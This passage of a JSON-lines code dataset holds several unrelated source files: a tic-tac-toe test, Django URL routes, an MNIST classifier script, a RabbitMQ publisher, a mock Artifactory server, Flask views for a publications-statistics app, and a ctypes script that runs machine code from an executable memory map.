self.grid.play('bottom_right') # O\n self.computer.play_on_grid(self.grid, \"X\", \"O\") # X\n self.assertEqual(self.grid.get_grid(), \"X OX X O\")\n self.assertEqual(self.grid.get_winning_player(), 'X')\n def test_computer_tries_to_win_from_2_in_row_down_right_side(self):\n self.grid.play('top_right') # X\n self.grid.play('top_left') # O\n self.grid.play('bottom_right') # X\n self.grid.play('bottom_left') # O\n self.computer.play_on_grid(self.grid, \"X\", \"O\") # X\n self.assertEqual(self.grid.get_grid(), \"O X XO X\")\n self.assertEqual(self.grid.get_winning_player(), 'X')\n def test_computer_doesnt_try_to_win_where_opponent_has_marker(self):\n self.grid.play('top_right') # X\n self.grid.play('top_left') # O\n self.grid.play('bottom_right') # X\n self.grid.play('middle_right') # O [blocks X win]\n self.computer.play_on_grid(self.grid, \"X\", \"O\") # X\n self.assertNumberOfPlaysOnGrid(self.grid.get_grid(), 5)\n def test_computer_plays_in_blank_if_cant_win(self):\n for move_2 in range(1, 9):\n grid = Grid(\"XO\") # Use new grid each time\n grid.play('top_left')\n grid.play(Grid.textual_positions[move_2])\n self.computer.play_on_grid(grid, \"X\", \"O\")\n self.assertNumberOfPlaysOnGrid(grid.get_grid(), 3, Grid.textual_positions[move_2])\n def test_computer_can_block(self):\n self.grid.play('top_right') # X\n self.grid.play('top_left') # O\n self.grid.play('bottom_middle') # X\n self.grid.play('middle_left') # O\n self.computer.play_on_grid(self.grid, \"X\", \"O\") # X\n grid_s = self.grid.get_grid()\n self.assertNumberOfPlaysOnGrid(grid_s, 5)\n self.assertEqual(grid_s, \"O XO XX \")\n def test_computer_plays_in_center_if_unoccupied_and_not_first_move(self):\n for move_1 in range(0, 9):\n grid = Grid(\"XO\") # Use new grid each time\n grid.play(Grid.textual_positions[move_1])\n self.computer.play_on_grid(grid, \"O\", \"X\")\n self.assertNumberOfPlaysOnGrid(grid.get_grid(), 2, Grid.textual_positions[move_1])\n expected_grid = [\"X\" if i==move_1 else \" \" for i in range(0, 9)]\n if move_1 != 4:\n expected_grid[4] = \"O\"\n else:\n expected_grid[0] = \"O\"\n self.assertEqual(grid.get_grid(), \"\".join(expected_grid))\n def test_computer_starts_in_the_corner(self): # best probabilistic strategy\n self.computer.play_on_grid(self.grid, \"X\", \"O\")\n grid_s = self.grid.get_grid()\n self.assertNumberOfPlaysOnGrid(grid_s, 1)\n X_index = grid_s.find(\"X\")\n self.assertTrue(X_index in (0, 2, 6, 8))\n def test_computer_detects_and_plays_a_fork(self):\n self.grid.play('top_left')\n self.grid.play('top_middle')\n self.grid.play('center')\n self.grid.play('bottom_right')\n self.computer.play_on_grid(self.grid, \"X\", \"O\")\n grid_str = self.grid.get_grid()\n self.assertNumberOfPlaysOnGrid(grid_str, 5)\n self.assertIn(grid_str, (\"XO XX O\", \"XO X X O\"))\n def test_computer_detects_and_blocks_fork(self):\n self.grid.play('center')\n self.computer.play_on_grid(self.grid, \"O\", \"X\")\n self.grid.play('bottom_right')\n self.computer.play_on_grid(self.grid, \"O\", \"X\")\n grid_str = self.grid.get_grid()\n self.assertNumberOfPlaysOnGrid(grid_str, 4)\n self.assertEqual(grid_str, \"O O X X\")\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":21076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"458646057","text":"from django.conf.urls import patterns, url\n\nfrom publications import views\n\nurlpatterns = patterns('',\n # Publications List\n url(r'^$', 
views.publications, name='publications'),\n\n # General publication actions\n # url(r'^create/$', views.createPublication, name='createPublication'),\n url(r'^vote/$', views.votePublication, name='votePublication'),\n url(r'^delete/$', views.deletePublication, name='deletePublication'),\n\n # Announcements actions\n # url(r'^announcements/$', views.announcements, name='announcements'),\n # url(r'^announcements/create/$', views.createAnnouncement, name='createAnnouncement'),\n # url(r'^announcements/(?P\\d+)$', views.announcementDetails, name='announcementDetails'),\n # url(r'^announcements/edit/(?P\\d+)$', views.editAnnouncement, name='editAnnouncement'),\n\n # Class material actions\n # url(r'^classmaterial/$', views.classMaterial, name='classMaterial'),\n # url(r'^classmaterial/create/$', views.createClassMaterial, name='createClassMaterial'),\n # url(r'^classmaterial/(?P\\d+)$', views.classMaterialDetails, name='classMaterialDetails'),\n # url(r'^classmaterial/edit/(?P\\d+)$', views.editClassMaterial, name='editClassMaterial'),\n\n # Event actions\n url(r'^events/$', views.events, name='events'),\n url(r'^events/create/$', views.createEvent, name='createEvent'),\n url(r'^events/(?P\\d+)$', views.eventDetails, name='eventDetails'),\n url(r'^events/edit/(?P\\d+)$', views.editEvent, name='editEvent'),\n\n # Job Offer actions\n # url(r'^joboffers/$', views.joboffers, name='joboffers'),\n # url(r'^joboffers/create/$', views.createJobOffer, name='createJobOffer'),\n # url(r'^joboffers/(?P\\d+)$', views.jobOfferDetails, name='jobOfferDetails'),\n # url(r'^joboffers/edit/(?P\\d+)$', views.editJobOffer, name='editJobOffer'),\n\n # Lost and Found Actions\n # url(r'^lostandfound/$', views.lostAndFound, name='lostAndFound'),\n # url(r'^lostandfound/create/$', views.createLostAndFound, name='createLostAndFound'),\n # url(r'^lostandfound/(?P\\d+)$', views.lostAndFoundDetails, name='lostAndFoundDetails'),\n # url(r'^lostandfound/edit/(?P\\d+)$', views.editLostAndFound, name='editLostAndFound'),\n \n # Buy and Sell Actions\n # url(r'^buyandsell/$', views.buyandsell, name='buyandsell'),\n # url(r'^buyandsell/create/$', views.createBuyAndSell, name='createBuyAndSell'),\n # url(r'^buyandsell/(?P\\d+)$', views.buyAndSellDetails, name='buyAndSellDetails'),\n # url(r'^buyandsell/edit/(?P\\d+)$', views.editBuyAndSell, name='editBuyAndSell'),\n)\n","sub_path":"publications/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"206432730","text":"from sklearn import svm, metrics\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd\r\n\r\ndef changeValue(lst):\r\n return [float(v)/255 for v in lst]\r\n\r\n## 0. Training Data, Test Data\r\n\r\ncsv = pd.read_csv('C:/PySource/Project1/mnist/train_10k.csv')\r\ntrain_data = csv.iloc[:, 1:].values\r\ntrain_data = list(map(changeValue, train_data))\r\ntrain_label = csv.iloc[:, 0].values\r\n\r\ncsv = pd.read_csv('C:/PySource/Project1/mnist/t10k_0.5k.csv')\r\ntest_data = csv.iloc[:, 1:].values\r\ntest_data = list(map(changeValue, test_data))\r\ntest_label = csv.iloc[:, 0].values\r\n## 학습용, 훈련용 분리\r\n\r\n# train_data, test_data, train_label, test_label = \\\r\n# train_test_split(train_data, train)label, train_size=0.3)\r\n## 1. Create Classfire - Select ML Algorithm\r\n\r\nclf = svm.NuSVC(gamma='auto')\r\n\r\n## 2. 
Learning Data\r\n#clf.fit([훈련 데이터], [정답])\r\n\r\nclf.fit(train_data, train_label)\r\n\r\nimport joblib\r\n\r\njoblib.dump(clf,'mnist_model_10k.dmp')\r\n\r\nclf=joblib.load('mnist_model_10k.dmp')\r\n\r\n\r\n## 3. Predict\r\n# clf.predict([예측할 데이터])\r\n\r\n## 4. Check Accuracy Rate\r\n\r\nresult = clf.predict(test_data)\r\n\r\nscore = metrics.accuracy_score(result, test_label)\r\nprint(result)\r\nprint(\"정답률: \",\"{0:.2f}%\".format(score*100))\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimg= np.array(test_data[0]).reshape([28,28])\r\nplt.imshow(img, cmap='gray')\r\nplt.show()\r\n\r\n","sub_path":"Code14-07 ML scikit-Learn 06 MNIST 모델 저장.py","file_name":"Code14-07 ML scikit-Learn 06 MNIST 모델 저장.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"373909588","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport tempfile\nfrom shutil import rmtree\n\nimport pytest\n\n__author__ = \"Florian Wilhelm\"\n__copyright__ = \"Blue Yonder\"\n__license__ = \"new BSD\"\n\n\n@pytest.yield_fixture()\ndef tmpdir():\n old_path = os.getcwd()\n newpath = tempfile.mkdtemp()\n os.chdir(newpath)\n yield\n rmtree(newpath)\n os.chdir(old_path)","sub_path":"tests/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"172794678","text":"import pika\nfrom time import sleep\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\nchannel.queue_declare(queue='cle_queue')\n\n\ndef publish(message):\n channel.basic_publish(exchange='',\n routing_key='cle_queue',\n body=message)\n print(\"Published to rabbit\")\n print(message)\n\n\nif __name__ == '__main__':\n while True:\n publish(\"test\")\n sleep(1)\n","sub_path":"CLE/ds/rabbit.py","file_name":"rabbit.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"609257713","text":"#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-\n\nimport json, os, os.path as path\nfrom bes.web.web_server import web_server\nfrom bes.system.log import log\nfrom bes.fs.file_find import file_find\nfrom bes.fs.file_util import file_util\nfrom bes.compat import url_compat\n\nfrom .artifactory_requests import artifactory_requests\n\nclass mock_artifactory_server(web_server):\n 'A mock artifactory web server. Tries to impersonate artifactory enough to do unit tests.'\n\n def __init__(self, port = None, root_dir = None, artifactory_id = '', users = None):\n super(mock_artifactory_server, self).__init__(port = port, users = users, log_tag = 'artifactory')\n self._root_dir = root_dir or os.getcwd()\n self._artifactory_id = artifactory_id\n\n _ERROR_404_HTML = '''\n\n \n 404 - Not found\n \n \n

404 - Not found

\n \n\n'''\n\n _ERROR_405_HTML = '''\n\n \n 405 - Method not supported\n \n \n

405 - Method not supported

\n \n\n'''\n \n def handle_request(self, environ, start_response):\n print_environ = False\n #print_environ = True\n \n print_headers = False\n #print_headers = True\n\n if print_headers:\n for key, value in sorted(self.headers.items()):\n log.output('HEADER: %s=%s\\n' % (key, value), console = True)\n\n if print_environ:\n for key, value in sorted(environ.items()):\n log.output('%s=%s\\n' % (key, value), console = True)\n method = environ['REQUEST_METHOD']\n path_info = self.path_info(environ)\n if path_info.path_info.startswith('/api'):\n return self._api(environ, path_info, start_response)\n if method == 'GET':\n return self._get(environ, path_info, start_response)\n elif method == 'PUT':\n return self._put(environ, path_info, start_response)\n if method == 'HEAD':\n return self._head(environ, path_info, start_response)\n else:\n return self.response_error(start_response, 405)\n\n def _get(self, environ, path_info, start_response):\n if not path.isfile(path_info.rooted_filename):\n return self.response_error(start_response, 404)\n mime_type = self.mime_type(path_info.rooted_filename)\n content = file_util.read(path_info.rooted_filename)\n headers = [\n ( 'Content-Type', str(mime_type) ),\n ( 'Content-Length', str(len(content)) ),\n ( 'X-Artifactory-Filename', path.basename(path_info.path_info) ),\n ( 'X-Artifactory-Id', self._artifactory_id ),\n ]\n headers += artifactory_requests.checksum_headers_for_file(path_info.rooted_filename).items()\n return self.response_success(start_response, 200, [ content ], headers)\n\n def _head(self, environ, path_info, start_response):\n if not path.isfile(path_info.rooted_filename):\n return self.response_error(start_response, 404)\n mime_type = self.mime_type(path_info.rooted_filename)\n headers = [\n ( 'Content-Type', str(mime_type) ),\n ( 'Content-Length', str(file_util.size(path_info.rooted_filename)) ),\n ( 'X-Artifactory-Filename', path.basename(path_info.path_info) ),\n ( 'X-Artifactory-Id', self._artifactory_id ),\n ]\n headers += artifactory_requests.checksum_headers_for_file(path_info.rooted_filename).items()\n return self.response_success(start_response, 200, [], headers)\n \n def _put(self, environ, path_info, start_response):\n 'https://www.jfrog.com/confluence/display/RTF/Artifactory+REST+API#ArtifactoryRESTAPI-DeployArtifact'\n content_length = int(environ['CONTENT_LENGTH'])\n# filename = environ['PATH_INFO']\n# filename = file_util.lstrip_sep(filename)\n# file_path = path.join(self._root_dir, filename)\n fin = environ['wsgi.input']\n chunk_size = 1024\n n = int(content_length / chunk_size)\n r = int(content_length % chunk_size)\n file_util.ensure_file_dir(path_info.rooted_filename)\n with open(path_info.rooted_filename, 'wb') as fout:\n for i in range(0, n):\n chunk = fin.read(chunk_size)\n fout.write(chunk)\n if r:\n chunk = fin.read(r)\n fout.write(chunk)\n fout.flush()\n fout.close()\n base = '%s://%s' % (environ['wsgi.url_scheme'], environ['HTTP_HOST'])\n uri = url_compat.urljoin(base, path_info.path_info)\n data = {\n 'downloadUri': uri,\n }\n content = json.dumps(data, indent = 2) + '\\n'\n content = content.encode('utf8')\n headers = [\n ( 'Content-Type', 'application/json' ),\n ( 'Content-Length', str(len(content)) ),\n ]\n return self.response_success(start_response, 201, [ content ], headers)\n\n def _api(self, environ, path_info, start_response):\n parts = path_info.path_info.split('/')\n what = parts[2]\n if what == 'storage':\n return self._api_storage(environ, path_info, start_response)\n assert False\n\n def 
_api_storage(self, environ, path_info, start_response):\n xpath = file_util.remove_head(path_info.path_info, '/api/storage')\n fpath = path.join(self._root_dir, xpath)\n files = file_find.find(fpath, relative = True)\n for f in files:\n print('FILE: %s' % (f))\n# print(xpath)\n import sys\n sys.stdout.flush()\n assert False\n","sub_path":"lib/rebuild/artifactory/mock_artifactory_server.py","file_name":"mock_artifactory_server.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"146840927","text":"from comp61542 import app\nfrom database import database\nfrom flask import (render_template, request)\nfrom comp61542.statistics import utils\nimport json\nfrom flask.json import jsonify\ndef format_data(data):\n fmt = \"%.2f\"\n result = []\n for item in data:\n if type(item) is list:\n result.append(\", \".join([ (fmt % i).rstrip('0').rstrip('.') for i in item ]))\n else:\n result.append((fmt % item).rstrip('0').rstrip('.'))\n return result\n\n@app.route(\"/averages\")\ndef showAverages():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n db.set_breadcrump(name=\"Averages\", link= \"/averages\")\n \n args = {\"dataset\":dataset, \"id\":\"averages\"}\n args['title'] = \"Averaged Data\"\n db.title_cache = args['title']\n tables = []\n headers = [\"Average\", \"Conference Paper\", \"Journal\", \"Book\", \"Book Chapter\", \"All Publications\"]\n averages = [ database.Stat.MEAN, database.Stat.MEDIAN, database.Stat.MODE ]\n tables.append({\n \"id\":1,\n \"title\":\"Average Authors per Publication\",\n \"header\":headers,\n \"rows\":[\n [ database.Stat.STR[i] ]\n + format_data(db.get_average_authors_per_publication(i)[1])\n for i in averages ] })\n tables.append({\n \"id\":2,\n \"title\":\"Average Publications per Author\",\n \"header\":headers,\n \"rows\":[\n [ database.Stat.STR[i] ]\n + format_data(db.get_average_publications_per_author(i)[1])\n for i in averages ] })\n tables.append({\n \"id\":3,\n \"title\":\"Average Publications in a Year\",\n \"header\":headers,\n \"rows\":[\n [ database.Stat.STR[i] ]\n + format_data(db.get_average_publications_in_a_year(i)[1])\n for i in averages ] })\n tables.append({\n \"id\":4,\n \"title\":\"Average Authors in a Year\",\n \"header\":headers,\n \"rows\":[\n [ database.Stat.STR[i] ]\n + format_data(db.get_average_authors_in_a_year(i)[1])\n for i in averages ] })\n\n args['tables'] = tables\n args[\"breadcrump\"] = db.breadcrump\n return render_template(\"averages.html\", args=args)\n\n\n\n@app.route(\"/coauthors\")\ndef showCoAuthors():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n db.set_breadcrump(name=\"coauthors\", link= \"/coauthors\")\n \n PUB_TYPES = [\"Conference Papers\", \"Journals\", \"Books\", \"Book Chapters\", \"All Publications\"]\n args = {\"dataset\":dataset, \"id\":\"coauthors\"}\n args[\"title\"] = \"Co-Authors\"\n \n db.title_cache = args['title']\n start_year = db.min_year\n if \"start_year\" in request.args:\n start_year = int(request.args.get(\"start_year\"))\n\n end_year = db.max_year\n if \"end_year\" in request.args:\n end_year = int(request.args.get(\"end_year\"))\n\n pub_type = 4\n if \"pub_type\" in request.args:\n pub_type = int(request.args.get(\"pub_type\"))\n\n args[\"data\"] = db.get_coauthor_data(start_year, end_year, pub_type)\n args[\"start_year\"] = start_year\n args[\"end_year\"] = end_year\n args[\"pub_type\"] = pub_type\n args[\"min_year\"] = db.min_year\n args[\"max_year\"] = db.max_year\n 
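# Expose both the requested year range and the dataset's full range so the\n    # template can render the filter controls alongside the results.\n    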
args[\"start_year\"] = start_year\n    args[\"end_year\"] = end_year\n    args[\"pub_str\"] = PUB_TYPES[pub_type]\n    db.args_cache = args\n    db.title_cache = args['title']\n    args[\"breadcrump\"] = db.breadcrump\n    return render_template(\"coauthors.html\", args=args)\n\n@app.route(\"/firstLastSoleType\")\ndef showAuthorFirstLastSolePerType():\n    dataset = app.config['DATASET']\n    db = app.config['DATABASE']\n    db.set_breadcrump(name=\"Author order\", link=\"/firstLastSoleType\")\n    PUB_TYPES = [\"Conference Papers\", \"Journals\", \"Books\", \"Book Chapters\", \"All Publications\"]\n    args = {\"dataset\":dataset, \"id\":\"firstLastSoleType\"}\n    args[\"title\"] = \"Author First/Last/Sole per publication type\"\n\n    db.title_cache = args['title']\n\n    pub_type = 4\n    if \"pub_type\" in request.args:\n        pub_type = int(request.args.get(\"pub_type\"))\n\n    args[\"data\"] = db.get_all_authors_stats(pub_type)\n    args[\"pub_type\"] = pub_type\n    args[\"pub_str\"] = PUB_TYPES[pub_type]\n    db.args_cache = args\n    db.title_cache = args['title']\n    return render_template('authorFirstLastSolePerType.html', args=args)\n\n@app.route(\"/\")\ndef showStatisticsMenu():\n    dataset = app.config['DATASET']\n    db = app.config['DATABASE']\n    db.set_breadcrump(name=\"Home\", link= \"/\", level=0)\n\n    args = {\"dataset\":dataset}\n    return render_template('statistics.html', args=args)\n\n@app.route(\"/statisticsdetails/<status>\")\ndef showPublicationSummary(status):\n    dataset = app.config['DATASET']\n    db = app.config['DATABASE']\n    args = {\"dataset\":dataset, \"id\":status}\n    if (status == \"publication_summary\"):\n        args[\"title\"] = \"Publication Summary\"\n        args[\"data\"] = db.get_publication_summary()\n\n    if (status == \"publication_author\"):\n        args[\"title\"] = \"Author Publication\"\n        args[\"data\"] = db.get_publications_by_author()\n\n    if (status == \"publication_year\"):\n        args[\"title\"] = \"Publication by Year\"\n        args[\"data\"] = db.get_publications_by_year()\n\n    if (status == \"author_year\"):\n        args[\"title\"] = \"Author by Year\"\n        args[\"data\"] = db.get_author_totals_by_year()\n\n    if (status == \"author_first_last_sole\"):\n        args[\"title\"] = \"Author statistics\"\n        args[\"data\"] = db.get_all_authors_stats()\n\n    if (status == \"author_first_last_sole_per_type\"):\n        args[\"title\"] = \"Author statistics per type\"\n        args[\"data\"] = db.get_all_authors_stats(3)\n\n    db.title_cache = args['title']\n    db.set_breadcrump(name=args[\"title\"], link=\"/statisticsdetails/\" + status )\n    args[\"breadcrump\"] = db.breadcrump\n    return render_template('statistics_details.html', args=args)\n\n@app.route(\"/authorsDegreeOfSeparation\")\ndef displayDegreeOfSeparation():\n    dataset = app.config['DATASET']\n    db = app.config['DATABASE']\n    db.set_breadcrump(name=\"Degree of separation\", link=\"/authorsDegreeOfSeparation\")\n    args = {\"dataset\":dataset}\n    args[\"title\"] = \"Degree Of Separation\"\n# author_names = [ author.name for author in db.authors ]\n# authors = [ author.name for author in db.authors ]\n    author_A = \" - \"\n    author_B = \" - \"\n    degree_of_separation = \" - \"\n    args[\"graph_js\"] = None\n    db.cache_graph = None\n    if \"authorA\" in request.args and \"authorB\" in request.args:\n        author_A = request.args.get(\"authorA\")\n        author_B = request.args.get(\"authorB\")\n        db.generate_degrees_of_separation_graph()\n        degree_of_separation=db.bfs(db.author_idx[author_A], db.author_idx[author_B])\n        url = \"/authorsDegreeOfSeparation?authorA=\" + author_A + \"&authorB=\" + author_B\n        db.set_breadcrump(name=author_A + \" | \" + author_B, 
link=url, level=2)\n        graph = db.dfs(db.author_idx[author_A], db.author_idx[author_B], degree_of_separation+1)\n        db.cache_graph = graph\n        if degree_of_separation==-1:\n            degree_of_separation=\"X\"\n    args[\"columns\"] = (\"Author A\", \"Author B\", \"Degree of Separation\")\n    author_names = db.author_idx.keys()\n    author_names.sort()\n    args[\"author_names\"] = author_names\n    args[\"authorA\"] = author_A\n    args[\"authorB\"] = author_B\n    args[\"degree_of_separation\"] = degree_of_separation\n    args[\"breadcrump\"] = db.breadcrump\n\n\n    return render_template(\"authorsDegreeOfSeparation.html\", args=args)\n\n@app.route(\"/graph/<authora>/<authorb>\")\ndef getGraph(authora, authorb):\n    db = app.config['DATABASE']\n    db.generate_degrees_of_separation_graph()\n    degree_of_separation=db.bfs(db.author_idx[authora], db.author_idx[authorb])\n    graph = db.dfs(db.author_idx[authora], db.author_idx[authorb], degree_of_separation+1)\n    return jsonify(db.convertIDGraphToNames(graph))\n\n@app.route(\"/publications/<sortby>\")\ndef displayPublications(sortby):\n    dataset = app.config['DATASET']\n    db = app.config['DATABASE']\n    args = {\"dataset\":dataset, \"id\":sortby}\n    sortby = sortby.lower()\n    args[\"title\"] = \"Publications\"\n\n    if (sortby == \"year\"):\n        db.publications = db.sortPublicationsByYear()\n    elif (sortby == \"authors\"):\n        db.publications = db.sortPublicationsByFirstAuthors()\n    elif (sortby == \"title\"):\n        db.publications = db.sortPublicationsByTitle()\n    elif sortby == \"type\":\n        db.publications = db.sortPublicationsByType()\n    else:\n        db.publications = db.sortPublicationsByTitle()\n\n    args[\"data\"] = db.get_publication_list()\n    db.title_cache = args['title']\n\n    return render_template('publications.html', args=args)\n\n@app.route(\"/author/firstlast\")\ndef displayAuthorFirstLastSoleStats():\n    dataset = app.config['DATASET']\n    db = app.config['DATABASE']\n    try:\n        authorname = request.args.get('fname')\n        args = {\"dataset\":dataset, \"id\":authorname}\n        first = db.get_times_as_first(authorname)\n        last = db.get_times_as_last(authorname)\n        author = {'name':authorname, 'first':first, 'last':last}\n        args['title'] = \"Author First/Last/Sole stats\"\n        db.title_cache = args['title']\n\n        args['data'] = utils.author_stats_fist_last_table(author)\n        db.cache = args['data'][1]\n        db.header_cache = args['data'][0]\n        db.sorted_cache = [ False for i in range(0, len(db.header_cache))]\n        return render_template('author_first_last.html', args=args)\n    except:\n        return firstlast()\n\n@app.route(\"/stats/<field>\")\ndef sortByField(field):\n    db = app.config['DATABASE']\n    dataset = app.config['DATASET']\n    field = int(field)\n    args = {\"dataset\":dataset, \"id\":field}\n    db.sort_cache_generic(field)\n    db.set_breadcrump(name=\"Order by field: \" + db.header_cache[field], link=\"/stats/\"+str(field), level=2)\n    args['data'] = (db.header_cache, db.cache)\n    try:\n        args['title'] = db.title_cache\n    except:\n        pass #no title cached\n    args[\"breadcrump\"] = db.breadcrump\n    return render_template('statistics_details.html', args = args)\n\n@app.route(\"/stats/coauthors/<field>\")\ndef sortByCoauthorField(field):\n    db = app.config['DATABASE']\n    field = int(field)\n    db.sort_cache_generic(field)\n\n    args = db.args_cache\n    args['data'] = (db.header_cache, db.cache)\n    try:\n        args['title'] = db.title_cache\n    except:\n        pass #no title cached\n\n\n    db.title_cache = args['title']\n\n\n    return render_template('coauthors.html', args = args)\n\n@app.route(\"/stats/authors/<field>\")\ndef sortStatsField(field):\n    db = app.config['DATABASE']\n    field = int(field)\n    
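# Re-sort the cached table in place by the requested column, then re-render\n    # the authors view with the cached header and title (mirrors sortByField above).\n    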
db.sort_cache_generic(field)\n \n args = db.args_cache \n args['data'] = (db.header_cache, db.cache)\n try:\n args['title'] = db.title_cache\n except:\n pass #no title cached\n \n \n db.title_cache = args['title']\n\n args[\"breadcrump\"] = db.breadcrump \n return render_template('authorFirstLastSolePerType.html', args = args)\n\n\n \ndef displayAuthorStats(authorname, args):\n db = app.config['DATABASE']\n \n try:\n author_stats = db.get_author_stats(authorname)\n author = {'name':authorname, \"Conference\": author_stats[0], \"Journal\": author_stats[1], \"Book\": author_stats[2],\n \"Book Chapter\": author_stats[3], \"first\": author_stats[4], \"last\": author_stats[5], \"sole\": author_stats[6],\n \"Total\": author_stats[7], \"coauthors\": author_stats[8]}\n args['data'] = utils.author_all_stats_table(author)\n args['title'] = str(authorname)\n db.title_cache = args['title']\n return render_template('search_for_author.html', args=args)\n except:\n return searchPage()\n\n\ndef displayAuthorListWithHyperlinks(authors, args):\n db = app.config['DATABASE']\n \n args['title'] = \"Search result\"\n db.title_cache = args['title']\n header = [\"Author Name\"]\n data = [[author.name] for author in authors]\n args['data'] = (header, data)\n db.cache = data\n db.header_cache = header\n db.sorted_cache = [False for i in range(0, len(header))]\n return render_template('author_list.html', args=args)\n\n@app.route(\"/authors/search/author\")\ndef searchAuthorByKeyword():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n authorname = request.args.get('fname')\n \n args = {\"dataset\":dataset, \"id\":authorname}\n try:\n authors = db.search_author(authorname)\n except:\n return searchPage()\n if (len(authors) == 1):\n author_name = authors[0].name\n return getAuthorProfile(author_name)\n else:\n return displayAuthorListWithHyperlinks(authors, args)\n \n \n \n@app.route('/authors/search')\ndef searchPage():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n db.set_breadcrump(name=\"Author search\", link=\"/authors/search\")\n args = {\"dataset\":dataset, \"id\":'search'}\n args['title'] = 'Search'\n db.title_cache = args['title']\n args['data'] = '/authors/search/author'\n \n args['author_search_type'] = 'Search author'\n args['author_search_type_link'] = '/authors/search'\n args[\"breadcrump\"] = db.breadcrump\n return render_template('search.html', args=args)\n\n@app.route(\"/author\")\ndef firstlast():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n args = {\"dataset\":dataset, \"id\":'search'}\n args['title'] = 'Search'\n db.title_cache = args['title']\n args['data'] = '/author/firstlast'\n \n args['author_search_type'] = 'Number of times author appeared first or last'\n args['author_search_type_link'] = '/author'\n return render_template('search.html', args=args)\n\ndef showAllAuthorsFirstLastSole():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n PUB_TYPES = [\"Author\", \"Journals\", \"Books\", \"Book Chapters\", \"All Publications\"]\n args = {\"dataset\":dataset, \"id\":\"coauthors\"}\n args[\"title\"] = \"Co-Authors\"\n \n db.title_cache = args['title']\n start_year = db.min_year\n if \"start_year\" in request.args:\n start_year = int(request.args.get(\"start_year\"))\n\n end_year = db.max_year\n if \"end_year\" in request.args:\n end_year = int(request.args.get(\"end_year\"))\n\n pub_type = 4\n if \"pub_type\" in request.args:\n pub_type = int(request.args.get(\"pub_type\"))\n\n args[\"data\"] = db.get_coauthor_data(start_year, 
def showAllAuthorsFirstLastSole():\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n PUB_TYPES = [\"Author\", \"Journals\", \"Books\", \"Book Chapters\", \"All Publications\"]\n args = {\"dataset\": dataset, \"id\": \"coauthors\"}\n args[\"title\"] = \"Co-Authors\"\n \n db.title_cache = args['title']\n start_year = db.min_year\n if \"start_year\" in request.args:\n start_year = int(request.args.get(\"start_year\"))\n\n end_year = db.max_year\n if \"end_year\" in request.args:\n end_year = int(request.args.get(\"end_year\"))\n\n pub_type = 4\n if \"pub_type\" in request.args:\n pub_type = int(request.args.get(\"pub_type\"))\n\n args[\"data\"] = db.get_coauthor_data(start_year, end_year, pub_type)\n args[\"start_year\"] = start_year\n args[\"end_year\"] = end_year\n args[\"pub_type\"] = pub_type\n args[\"min_year\"] = db.min_year\n args[\"max_year\"] = db.max_year\n args[\"pub_str\"] = PUB_TYPES[pub_type]\n db.args_cache = args\n db.title_cache = args['title']\n return render_template(\"coauthors.html\", args=args)\n\n\n@app.route(\"/profile/<author>\")\ndef getAuthorProfile(author):\n dataset = app.config['DATASET']\n db = app.config['DATABASE']\n db.set_breadcrump(name=author, link=\"/profile/\" + author, level=2)\n args = {\"dataset\": dataset, \"id\": \"coauthors\"}\n args['title'] = author + \" profile\"\n args['real_author_name'] = author\n \n tables = db.get_author_profile(author)\n args[\"tables\"] = tables\n args[\"breadcrump\"] = db.breadcrump\n args[\"coauthor_names_dictionary\"] = db.get_coauthor_names(author)\n \n return render_template('author_profile.html', args=args)\n","sub_path":"src/comp61542/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"460504816","text":"#!/usr/bin/env python3\nimport ctypes\nimport mmap\n\ndef load_func(filename):\n # Map the file readable, writable and executable so the machine code\n # it contains can be called in place.\n src = open(filename, \"r+b\")\n buf = mmap.mmap(src.fileno(), 0, prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)\n return buf\n\ndef asm_func(buf, argtypes, restype):\n # CFUNCTYPE takes the return type first, followed by the argument types.\n ftype = ctypes.CFUNCTYPE(restype, *argtypes)\n fpointer = ctypes.c_void_p.from_buffer(buf)\n return ftype(ctypes.addressof(fpointer))\n\n
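# How the pointer dance in asm_func works: c_void_p.from_buffer(buf)\n# creates a ctypes object backed by the mmap's own memory, so\n# ctypes.addressof() yields the address of the mapped machine code, and\n# calling the CFUNCTYPE prototype on that address jumps into it. The\n# smoke test below assumes add2.bin holds code computing a*b + c, which\n# is what the printed comparison checks.\n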
argtypes = (ctypes.c_int, ctypes.c_int, ctypes.c_long)\nrestype = ctypes.c_long\nbuf = load_func(\"add2.bin\")\nf = asm_func(buf, argtypes, restype)\nr = f(422342, 212343, 123456789090)\nprint(r, 422342 * 212343 + 123456789090)\nbuf.close()\n","sub_path":"pyasm2.py","file_name":"pyasm2.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
